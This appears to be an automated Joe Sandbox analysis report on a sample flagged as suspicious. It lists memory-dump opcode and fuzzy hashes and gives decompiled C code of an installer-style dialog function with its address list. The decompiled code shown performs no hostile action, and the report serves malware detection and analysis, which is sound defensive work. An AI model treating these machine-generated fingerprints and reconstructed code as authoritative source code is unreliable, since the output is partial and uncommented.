                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e26d2165dc8ae4c6b966021e257f8685f1a3e74065089150f35f85b9d3fd2899
                                                              • Instruction ID: 4fb70272a5472626be6c1d1824df8ab3f9886418bfb15edccb241732b056ac1f
                                                              • Opcode Fuzzy Hash: e26d2165dc8ae4c6b966021e257f8685f1a3e74065089150f35f85b9d3fd2899
                                                              • Instruction Fuzzy Hash: 77618647E3E305C8E793B070C6613E155B2CF237C2F21CF1A4826B14A6B7AB8ACA0195
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee11dedf54a834de829da83d2163a417a7c3170aad94c3796b548899d548b99d
                                                              • Instruction ID: 19a7b712d48bcf6867cea34fab99f739a2fcfa1797b78b9cb90b05742939325a
                                                              • Opcode Fuzzy Hash: ee11dedf54a834de829da83d2163a417a7c3170aad94c3796b548899d548b99d
                                                              • Instruction Fuzzy Hash: 8D8123726183499FDF708E298C517DB77FAEF95390F95851EEC89A7204D330CA81CA92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b2359dd50c643a0b5bc5f9b3b7926a4b940dce512e4ee705fa6c8f1857775a0
                                                              • Instruction ID: 02957016f1807450a3f31d82da4c02ec045a36f19b0c2541546885e2920849fd
                                                              • Opcode Fuzzy Hash: 4b2359dd50c643a0b5bc5f9b3b7926a4b940dce512e4ee705fa6c8f1857775a0
                                                              • Instruction Fuzzy Hash: A651CB47E3E305C9E753B470C6513E565B2CF637D1F11CF1A4D26B25AAB3AB85CA0281
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c3da3e7bfcfde7cf4e59fd5df3608e1c267de39a9d1ff24d7fa354bead12d08b
                                                              • Instruction ID: 4e90ff2f5a48cf688dc8753f08d0321fec05118642c9de976235c75db3acc811
                                                              • Opcode Fuzzy Hash: c3da3e7bfcfde7cf4e59fd5df3608e1c267de39a9d1ff24d7fa354bead12d08b
                                                              • Instruction Fuzzy Hash: 7971147261834A9FDF709E288C507DB77FAEF55390F95811AEC89A7204D370DA81CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cda466e7455fac48687a2e881004caca4c003c0a094c024973fef82eef01566c
                                                              • Instruction ID: 83071af0cc60d5295c4d6a1eb7fb4d75491a5cb7fc81be8daf4d70f9609c2e52
                                                              • Opcode Fuzzy Hash: cda466e7455fac48687a2e881004caca4c003c0a094c024973fef82eef01566c
                                                              • Instruction Fuzzy Hash: 59510C3225A2915FCB26DA3A4C954CBBFA9DFC3344F6C4998C5928B213C520C597C782
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd8fa2275d085580a488741f966efbf36ca715d381c181d6d4813fd570ad15c2
                                                              • Instruction ID: 1670b1085c4c57d28d884ad99f3ea4943d4954960c0c5a13c4e221c1b0f71e65
                                                              • Opcode Fuzzy Hash: fd8fa2275d085580a488741f966efbf36ca715d381c181d6d4813fd570ad15c2
                                                              • Instruction Fuzzy Hash: CD51377251834A9FCF709E288D507DB77BAEF95350F95811EEC49A7204D3709E81C691
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(2B8EA5CF), ref: 032C1354
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 3844066ebbef454677667499f964c15739779d467dffe7f6d577f76fd1450336
                                                              • Instruction ID: 10c4130db1f8b12cd866f774c086671e1b3ee8b8810ad1c4169abff8a64bfa0a
                                                              • Opcode Fuzzy Hash: 3844066ebbef454677667499f964c15739779d467dffe7f6d577f76fd1450336
                                                              • Instruction Fuzzy Hash: 02517C346343968FDB26EE35C8B47E6B7A6EF42394F68439EC9464B251C33185C5CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 056d1565b4f35264599a6c9f4108ee08c77fe5c1e8e96c3de012c25c0618cb16
                                                              • Instruction ID: 6651890f447729b5d3c79612c90029789ca578e2f7c6d5eef6aef37931373f74
                                                              • Opcode Fuzzy Hash: 056d1565b4f35264599a6c9f4108ee08c77fe5c1e8e96c3de012c25c0618cb16
                                                              • Instruction Fuzzy Hash: D251687311934A9FCF709E288D407DB73BAEF66350F95814AEC8AA7204D330DA81C692
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01938735f7d0bc7c435a625019b478aba891e00423cef8f65f3d3226b422a538
                                                              • Instruction ID: a8a5e74597ec128ff34894b6368221aa57d6087e6628b749ceb27c9ef7161cc3
                                                              • Opcode Fuzzy Hash: 01938735f7d0bc7c435a625019b478aba891e00423cef8f65f3d3226b422a538
                                                              • Instruction Fuzzy Hash: C5413575A2438ADFDF309E688DA47DA37A6FF84380F854129DC8D9B241D3748AC6C750
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(2B8EA5CF), ref: 032C1354
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 30c5b8234a1037326f8179a3cb31de004ac52dd956b4428e438fb0d021c8ecea
                                                              • Instruction ID: b1e2e0c7c58d455c269badb3f057b9c3f4555732256441e14c7b986f1b058774
                                                              • Opcode Fuzzy Hash: 30c5b8234a1037326f8179a3cb31de004ac52dd956b4428e438fb0d021c8ecea
                                                              • Instruction Fuzzy Hash: 2441FE71A143488FCF359E698C893DA7BA2FF99350F46412EDCC99B224D3704A85CB06
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17a0497e8c0b9e8c9ad3fed3c2dff4e1634e5fdcfa23716e372c0d9977d01693
                                                              • Instruction ID: 8c6f0f97de74906a6c3e030a9aaf441e47646f69c4775fb7120ef7e1c44f0746
                                                              • Opcode Fuzzy Hash: 17a0497e8c0b9e8c9ad3fed3c2dff4e1634e5fdcfa23716e372c0d9977d01693
                                                              • Instruction Fuzzy Hash: 53318E715083858FEF2C9F70C5642EE7BA2EF92360F55455DC8D647955CB3405C2CB02
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7bc84a7c8f772e2df4a0796db0e47bc134e24df388e70020578a6e0f0bb4b316
                                                              • Instruction ID: 9a9d4d8c3e12a58c3eac4971cc1274f127afdf3a9931512a2c8e1e631b3482e4
                                                              • Opcode Fuzzy Hash: 7bc84a7c8f772e2df4a0796db0e47bc134e24df388e70020578a6e0f0bb4b316
                                                              • Instruction Fuzzy Hash: 2921D8356693874BD724DD38D4E23E763A27F6A700F98432EDC87C7252E761A885C245
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 186863f2f378a71f9e5de1922c726f781873c6aecb0f004a587b65f27e50d43b
                                                              • Instruction ID: caea6c4be44f01bbd314511e079234326f089b4703cb00bc1a688419f2d406e1
                                                              • Opcode Fuzzy Hash: 186863f2f378a71f9e5de1922c726f781873c6aecb0f004a587b65f27e50d43b
                                                              • Instruction Fuzzy Hash: 49B092782316808FCE52CA08C180E40B3A0B708B40B410485E8018BB12C264E840CA01
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                              				struct HWND__* _v8;
                                                              				struct HWND__* _v12;
                                                              				long _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				intOrPtr _v28;
                                                              				signed char* _v32;
                                                              				int _v36;
                                                              				signed int _v44;
                                                              				int _v48;
                                                              				signed int* _v60;
                                                              				signed char* _v64;
                                                              				signed int _v68;
                                                              				long _v72;
                                                              				void* _v76;
                                                              				intOrPtr _v80;
                                                              				intOrPtr _v84;
                                                              				void* _v88;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t198;
                                                              				intOrPtr _t201;
                                                              				long _t207;
                                                              				signed int _t211;
                                                              				signed int _t222;
                                                              				void* _t225;
                                                              				void* _t226;
                                                              				int _t232;
                                                              				long _t237;
                                                              				long _t238;
                                                              				signed int _t239;
                                                              				signed int _t245;
                                                              				signed int _t247;
                                                              				signed char _t248;
                                                              				signed char _t254;
                                                              				void* _t258;
                                                              				void* _t260;
                                                              				signed char* _t278;
                                                              				signed char _t279;
                                                              				long _t284;
                                                              				struct HWND__* _t291;
                                                              				signed int* _t292;
                                                              				int _t293;
                                                              				long _t294;
                                                              				signed int _t295;
                                                              				void* _t297;
                                                              				long _t298;
                                                              				int _t299;
                                                              				signed int _t300;
                                                              				signed int _t303;
                                                              				signed int _t311;
                                                              				signed char* _t319;
                                                              				int _t324;
                                                              				void* _t326;
                                                              
                                                              				_t291 = _a4;
                                                              				_v12 = GetDlgItem(_t291, 0x3f9);
                                                              				_v8 = GetDlgItem(_t291, 0x408);
                                                              				_t326 = SendMessageW;
                                                              				_v24 =  *0x42a288;
                                                              				_v28 =  *0x42a270 + 0x94;
                                                              				if(_a8 != 0x110) {
                                                              					L23:
                                                              					if(_a8 != 0x405) {
                                                              						_t301 = _a16;
                                                              					} else {
                                                              						_a12 = 0;
                                                              						_t301 = 1;
                                                              						_a8 = 0x40f;
                                                              						_a16 = 1;
                                                              					}
                                                              					if(_a8 == 0x4e || _a8 == 0x413) {
                                                              						_v16 = _t301;
                                                              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                              							if(( *0x42a279 & 0x00000002) != 0) {
                                                              								L41:
                                                              								if(_v16 != 0) {
                                                              									_t237 = _v16;
                                                              									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                              										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                              									}
                                                              									_t238 = _v16;
                                                              									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                              										_t301 = _v24;
                                                              										_t239 =  *(_t238 + 0x5c);
                                                              										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                              											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                              										} else {
                                                              											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                              										}
                                                              									}
                                                              								}
                                                              								goto L48;
                                                              							}
                                                              							if(_a8 == 0x413) {
                                                              								L33:
                                                              								_t301 = 0 | _a8 != 0x00000413;
                                                              								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                              								_t295 = _t245;
                                                              								if(_t295 >= 0) {
                                                              									_t94 = _v24 + 8; // 0x8
                                                              									_t301 = _t245 * 0x818 + _t94;
                                                              									_t247 =  *_t301;
                                                              									if((_t247 & 0x00000010) == 0) {
                                                              										if((_t247 & 0x00000040) == 0) {
                                                              											_t248 = _t247 ^ 0x00000001;
                                                              										} else {
                                                              											_t254 = _t247 ^ 0x00000080;
                                                              											if(_t254 >= 0) {
                                                              												_t248 = _t254 & 0x000000fe;
                                                              											} else {
                                                              												_t248 = _t254 | 0x00000001;
                                                              											}
                                                              										}
                                                              										 *_t301 = _t248;
                                                              										E0040117D(_t295);
                                                              										_a12 = _t295 + 1;
                                                              										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                              										_a8 = 0x40f;
                                                              									}
                                                              								}
                                                              								goto L41;
                                                              							}
                                                              							_t301 = _a16;
                                                              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                              								goto L41;
                                                              							}
                                                              							goto L33;
                                                              						} else {
                                                              							goto L48;
                                                              						}
                                                              					} else {
                                                              						L48:
                                                              						if(_a8 != 0x111) {
                                                              							L56:
                                                              							if(_a8 == 0x200) {
                                                              								SendMessageW(_v8, 0x200, 0, 0);
                                                              							}
                                                              							if(_a8 == 0x40b) {
                                                              								_t225 =  *0x42372c;
                                                              								if(_t225 != 0) {
                                                              									ImageList_Destroy(_t225);
                                                              								}
                                                              								_t226 =  *0x423740;
                                                              								if(_t226 != 0) {
                                                              									GlobalFree(_t226);
                                                              								}
                                                              								 *0x42372c = 0;
                                                              								 *0x423740 = 0;
                                                              								 *0x42a2c0 = 0;
                                                              							}
                                                              							if(_a8 != 0x40f) {
                                                              								L90:
                                                              								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                              									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                              									ShowWindow(_v8, _t324);
                                                              									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                              								}
                                                              								goto L93;
                                                              							} else {
                                                              								E004011EF(_t301, 0, 0);
                                                              								_t198 = _a12;
                                                              								if(_t198 != 0) {
                                                              									if(_t198 != 0xffffffff) {
                                                              										_t198 = _t198 - 1;
                                                              									}
                                                              									_push(_t198);
                                                              									_push(8);
                                                              									E00404FFF();
                                                              								}
                                                              								if(_a16 == 0) {
                                                              									L75:
                                                              									E004011EF(_t301, 0, 0);
                                                              									_v36 =  *0x423740;
                                                              									_t201 =  *0x42a288;
                                                              									_v64 = 0xf030;
                                                              									_v24 = 0;
                                                              									if( *0x42a28c <= 0) {
                                                              										L86:
                                                              										if( *0x42a31e == 0x400) {
                                                              											InvalidateRect(_v8, 0, 1);
                                                              										}
                                                              										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                              											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                              										}
                                                              										goto L90;
                                                              									}
                                                              									_t292 = _t201 + 8;
                                                              									do {
                                                              										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                              										if(_t207 != 0) {
                                                              											_t303 =  *_t292;
                                                              											_v72 = _t207;
                                                              											_v76 = 8;
                                                              											if((_t303 & 0x00000001) != 0) {
                                                              												_v76 = 9;
                                                              												_v60 =  &(_t292[4]);
                                                              												_t292[0] = _t292[0] & 0x000000fe;
                                                              											}
                                                              											if((_t303 & 0x00000040) == 0) {
                                                              												_t211 = (_t303 & 0x00000001) + 1;
                                                              												if((_t303 & 0x00000010) != 0) {
                                                              													_t211 = _t211 + 3;
                                                              												}
                                                              											} else {
                                                              												_t211 = 3;
                                                              											}
                                                              											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                              											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                              											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                              										}
                                                              										_v24 = _v24 + 1;
                                                              										_t292 =  &(_t292[0x206]);
                                                              									} while (_v24 <  *0x42a28c);
                                                              									goto L86;
                                                              								} else {
                                                              									_t293 = E004012E2( *0x423740);
                                                              									E00401299(_t293);
                                                              									_t222 = 0;
                                                              									_t301 = 0;
                                                              									if(_t293 <= 0) {
                                                              										L74:
                                                              										SendMessageW(_v12, 0x14e, _t301, 0);
                                                              										_a16 = _t293;
                                                              										_a8 = 0x420;
                                                              										goto L75;
                                                              									} else {
                                                              										goto L71;
                                                              									}
                                                              									do {
                                                              										L71:
                                                              										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                              											_t301 = _t301 + 1;
                                                              										}
                                                              										_t222 = _t222 + 1;
                                                              									} while (_t222 < _t293);
                                                              									goto L74;
                                                              								}
                                                              							}
                                                              						}
                                                              						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                              							goto L93;
                                                              						} else {
                                                              							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                              							if(_t232 == 0xffffffff) {
                                                              								goto L93;
                                                              							}
                                                              							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                              							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                              								_t294 = 0x20;
                                                              							}
                                                              							E00401299(_t294);
                                                              							SendMessageW(_a4, 0x420, 0, _t294);
                                                              							_a12 = _a12 | 0xffffffff;
                                                              							_a16 = 0;
                                                              							_a8 = 0x40f;
                                                              							goto L56;
                                                              						}
                                                              					}
                                                              				} else {
                                                              					_v36 = 0;
                                                              					_v20 = 2;
                                                              					 *0x42a2c0 = _t291;
                                                              					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                              					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                              					 *0x423734 =  *0x423734 | 0xffffffff;
                                                              					_t297 = _t258;
                                                              					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, 0x40563e);
                                                              					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                              					 *0x42372c = _t260;
                                                              					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                              					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                              					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                              						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                              					}
                                                              					DeleteObject(_t297);
                                                              					_t298 = 0;
                                                              					do {
                                                              						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                              						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                              							if(_t298 != 0x20) {
                                                              								_v20 = 0;
                                                              							}
                                                              							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                              						}
                                                              						_t298 = _t298 + 1;
                                                              					} while (_t298 < 0x21);
                                                              					_t299 = _a16;
                                                              					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                              					_push(0x15);
                                                              					E004045C4(_a4);
                                                              					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                              					_push(0x16);
                                                              					E004045C4(_a4);
                                                              					_t300 = 0;
                                                              					_v16 = 0;
                                                              					if( *0x42a28c <= 0) {
                                                              						L19:
                                                              						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                              						goto L20;
                                                              					} else {
                                                              						_t319 = _v24 + 8;
                                                              						_v32 = _t319;
                                                              						do {
                                                              							_t278 =  &(_t319[0x10]);
                                                              							if( *_t278 != 0) {
                                                              								_v64 = _t278;
                                                              								_t279 =  *_t319;
                                                              								_v88 = _v16;
                                                              								_t311 = 0x20;
                                                              								_v84 = 0xffff0002;
                                                              								_v80 = 0xd;
                                                              								_v68 = _t311;
                                                              								_v44 = _t300;
                                                              								_v72 = _t279 & _t311;
                                                              								if((_t279 & 0x00000002) == 0) {
                                                              									if((_t279 & 0x00000004) == 0) {
                                                              										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                              									} else {
                                                              										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                              									}
                                                              								} else {
                                                              									_v80 = 0x4d;
                                                              									_v48 = 1;
                                                              									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                              									_v36 = 1;
                                                              									 *( *0x423740 + _t300 * 4) = _t284;
                                                              									_v16 =  *( *0x423740 + _t300 * 4);
                                                              								}
                                                              							}
                                                              							_t300 = _t300 + 1;
                                                              							_t319 =  &(_v32[0x818]);
                                                              							_v32 = _t319;
                                                              						} while (_t300 <  *0x42a28c);
                                                              						if(_v36 != 0) {
                                                              							L20:
                                                              							if(_v20 != 0) {
                                                              								E004045F9(_v8);
                                                              								goto L23;
                                                              							} else {
                                                              								ShowWindow(_v12, 5);
                                                              								E004045F9(_v12);
                                                              								L93:
                                                              								return E0040462B(_a8, _a12, _a16);
                                                              							}
                                                              						}
                                                              						goto L19;
                                                              					}
                                                              				}
                                                              			}


























































                                                              0x00405038
                                                              0x00405051
                                                              0x00405056
                                                              0x0040505e
                                                              0x00405064
                                                              0x0040507a
                                                              0x0040507d
                                                              0x004052a8
                                                              0x004052af
                                                              0x004052c3
                                                              0x004052b1
                                                              0x004052b3
                                                              0x004052b6
                                                              0x004052b7
                                                              0x004052be
                                                              0x004052be
                                                              0x004052cf
                                                              0x004052dd
                                                              0x004052e0
                                                              0x004052f6
                                                              0x0040536b
                                                              0x0040536e
                                                              0x00405370
                                                              0x0040537a
                                                              0x00405388
                                                              0x00405388
                                                              0x0040538a
                                                              0x00405394
                                                              0x0040539a
                                                              0x0040539d
                                                              0x004053a0
                                                              0x004053bb
                                                              0x004053a2
                                                              0x004053ac
                                                              0x004053ac
                                                              0x004053a0
                                                              0x00405394
                                                              0x00000000
                                                              0x0040536e
                                                              0x004052fb
                                                              0x00405306
                                                              0x0040530b
                                                              0x00405312
                                                              0x00405317
                                                              0x0040531b
                                                              0x00405326
                                                              0x00405326
                                                              0x0040532a
                                                              0x0040532e
                                                              0x00405332
                                                              0x00405345
                                                              0x00405334
                                                              0x00405334
                                                              0x0040533b
                                                              0x00405341
                                                              0x0040533d
                                                              0x0040533d
                                                              0x0040533d
                                                              0x0040533b
                                                              0x00405349
                                                              0x0040534b
                                                              0x0040535e
                                                              0x00405361
                                                              0x00405364
                                                              0x00405364
                                                              0x0040532e
                                                              0x00000000
                                                              0x0040531b
                                                              0x004052fd
                                                              0x00405304
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004053be
                                                              0x004053be
                                                              0x004053c5
                                                              0x00405436
                                                              0x0040543e
                                                              0x00405446
                                                              0x00405446
                                                              0x0040544f
                                                              0x00405451
                                                              0x00405458
                                                              0x0040545b
                                                              0x0040545b
                                                              0x00405461
                                                              0x00405468
                                                              0x0040546b
                                                              0x0040546b
                                                              0x00405471
                                                              0x00405477
                                                              0x0040547d
                                                              0x0040547d
                                                              0x0040548a
                                                              0x004055eb
                                                              0x004055f2
                                                              0x0040560f
                                                              0x00405615
                                                              0x00405627
                                                              0x00405627
                                                              0x00000000
                                                              0x00405490
                                                              0x00405492
                                                              0x00405497
                                                              0x0040549c
                                                              0x004054a1
                                                              0x004054a3
                                                              0x004054a3
                                                              0x004054a4
                                                              0x004054a5
                                                              0x004054a7
                                                              0x004054a7
                                                              0x004054af
                                                              0x004054f0
                                                              0x004054f2
                                                              0x00405502
                                                              0x00405505
                                                              0x0040550a
                                                              0x00405511
                                                              0x00405514
                                                              0x004055b6
                                                              0x004055bf
                                                              0x004055c7
                                                              0x004055c7
                                                              0x004055d5
                                                              0x004055e6
                                                              0x004055e6
                                                              0x00000000
                                                              0x004055d5
                                                              0x0040551a
                                                              0x0040551d
                                                              0x00405523
                                                              0x00405528
                                                              0x0040552a
                                                              0x0040552c
                                                              0x00405532
                                                              0x00405539
                                                              0x0040553e
                                                              0x00405545
                                                              0x00405548
                                                              0x00405548
                                                              0x0040554f
                                                              0x0040555b
                                                              0x0040555f
                                                              0x00405561
                                                              0x00405561
                                                              0x00405551
                                                              0x00405553
                                                              0x00405553
                                                              0x00405581
                                                              0x0040558d
                                                              0x0040559c
                                                              0x0040559c
                                                              0x0040559e
                                                              0x004055a1
                                                              0x004055aa
                                                              0x00000000
                                                              0x004054b1
                                                              0x004054bc
                                                              0x004054bf
                                                              0x004054c4
                                                              0x004054c6
                                                              0x004054ca
                                                              0x004054da
                                                              0x004054e4
                                                              0x004054e6
                                                              0x004054e9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004054cc
                                                              0x004054cc
                                                              0x004054d2
                                                              0x004054d4
                                                              0x004054d4
                                                              0x004054d5
                                                              0x004054d6
                                                              0x00000000
                                                              0x004054cc
                                                              0x004054af
                                                              0x0040548a
                                                              0x004053cd
                                                              0x00000000
                                                              0x004053e3
                                                              0x004053ed
                                                              0x004053f2
                                                              0x00000000
                                                              0x00000000
                                                              0x00405404
                                                              0x00405409
                                                              0x00405415
                                                              0x00405415
                                                              0x00405417
                                                              0x00405426
                                                              0x00405428
                                                              0x0040542c
                                                              0x0040542f
                                                              0x00000000
                                                              0x0040542f
                                                              0x004053cd
                                                              0x00405083
                                                              0x00405088
                                                              0x00405091
                                                              0x00405098
                                                              0x004050aa
                                                              0x004050b5
                                                              0x004050bb
                                                              0x004050c9
                                                              0x004050dd
                                                              0x004050e2
                                                              0x004050ef
                                                              0x004050f4
                                                              0x0040510a
                                                              0x0040511b
                                                              0x00405128
                                                              0x00405128
                                                              0x0040512b
                                                              0x00405131
                                                              0x00405133
                                                              0x00405136
                                                              0x0040513b
                                                              0x00405140
                                                              0x00405142
                                                              0x00405142
                                                              0x00405162
                                                              0x00405162
                                                              0x00405164
                                                              0x00405165
                                                              0x0040516a
                                                              0x00405170
                                                              0x00405174
                                                              0x00405179
                                                              0x00405181
                                                              0x00405185
                                                              0x0040518a
                                                              0x0040518f
                                                              0x00405197
                                                              0x0040519a
                                                              0x0040526a
                                                              0x0040527d
                                                              0x00000000
                                                              0x004051a0
                                                              0x004051a3
                                                              0x004051a6
                                                              0x004051a9
                                                              0x004051a9
                                                              0x004051af
                                                              0x004051b8
                                                              0x004051bb
                                                              0x004051bf
                                                              0x004051c2
                                                              0x004051c5
                                                              0x004051ce
                                                              0x004051d7
                                                              0x004051da
